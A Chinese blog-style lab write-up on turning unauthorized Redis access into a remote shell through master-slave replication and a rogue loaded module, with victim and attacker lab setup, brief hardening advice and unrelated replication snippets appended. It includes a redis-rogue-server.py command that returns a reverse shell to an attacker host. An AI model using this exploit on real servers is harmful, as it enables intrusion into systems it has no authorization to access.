通過主從複製 GetShell

2022-09-15 12:42:14 字數 1227 閱讀 7191

redis是乙個使用ansi c編寫的開源、支援網路、基於記憶體、可選永續性的鍵值對儲存資料庫。但如果當把資料儲存在單個redis的例項中,當讀寫體量比較大的時候,服務端就很難承受。為了應對這種情況,redis就提供了主從模式,主從模式就是指使用乙個redis例項作為主機,其他例項都作為備份機,其中主機和從機資料相同,而從機只負責讀,主機只負責寫,通過讀寫分離可以大幅度減輕流量的壓力,算是一種通過犧牲空間來換取效率的緩解方式。

在了解了主從同步之後,我們還需要對redis的模組有所了解。

在redis 4.x之後,redis新增了模組功能,通過外部拓展,可以實現在redis中實現乙個新的redis命令,通過寫c語言並編譯出.so檔案。

由此可知,此方式的利用範圍。

redis 4.x-redis 5.x

靶機:ubuntu 18.04.1   ip:192.168.112.132

攻擊機:kali   ip:192.168.112.133

一、環境搭建。

1)wget

tar -xvzf redis-5.0.0.tar.gz

cd redis-5.0.0

make

2)不同機器上需更改redis.conf配置檔案

protected-mode yes 改為

protected-mode no

#關閉redis保護模式

bind 127.0.0.1 改為

3)靶機啟動服務

cd src

./redis-server ../redis.conf

#載入指定配置

二、exp準備

用法:python3 redis-rogue-server.py --rhost=192.168.112.132 --lhost=192.168.112.133 --exp=exp.so

三、exploit

彈shell至本機的時候,需輸入攻擊機ip,輸入監聽埠。

監聽,成功。

修復建議:

由於該漏洞利用前提是獲取redis訪問許可權,也就是基於redis未授權訪問。因此可考慮把產生問題的傢伙解決掉。

redis加固:

Mysql主從複製和Redis主從複製的區別

這是學習的時候自己總結的筆記,因為使用typora記筆記,導致太多的筆記分散,所以傳到部落格方便查詢,代表的是typora裡的高亮 mysql主從複製和redis主從複製的區別 複製時機 mysql的主從複製是 從接入點開始 主機之前的資料,從機不會複製 但是redis是 從頭開始備份 主機之前的資...

mysql主從複製

罪過啊,博主最近好久沒有更新部落格了,轉有道雲筆記了,筆記裡還有些乾貨,最近慢慢分享出來吧。博主最近發現有好多想學,但是發現精力有限啊,博主本來是搞個開發的,但是偏偏想把運維,dba的技術全都學了 mysql集群,nginx等等等 但是發現精力有限,所以簡單了解一下,mysql的主從複製,後面還有m...

MySQL 主從複製

1.概念 將主伺服器的資料複製到另外一台或多台伺服器的過程。也即將主資料庫的ddl和dml操作通過二進位制日誌傳到復 務器上,然後在從伺服器上對這些日誌進行重新執行,從而 保持資料同步。2.作用 降低主伺服器的訪問壓力 避免主伺服器因故障導致資料丟失。3.操作步驟 1 主伺服器將資料的改變記錄到二進...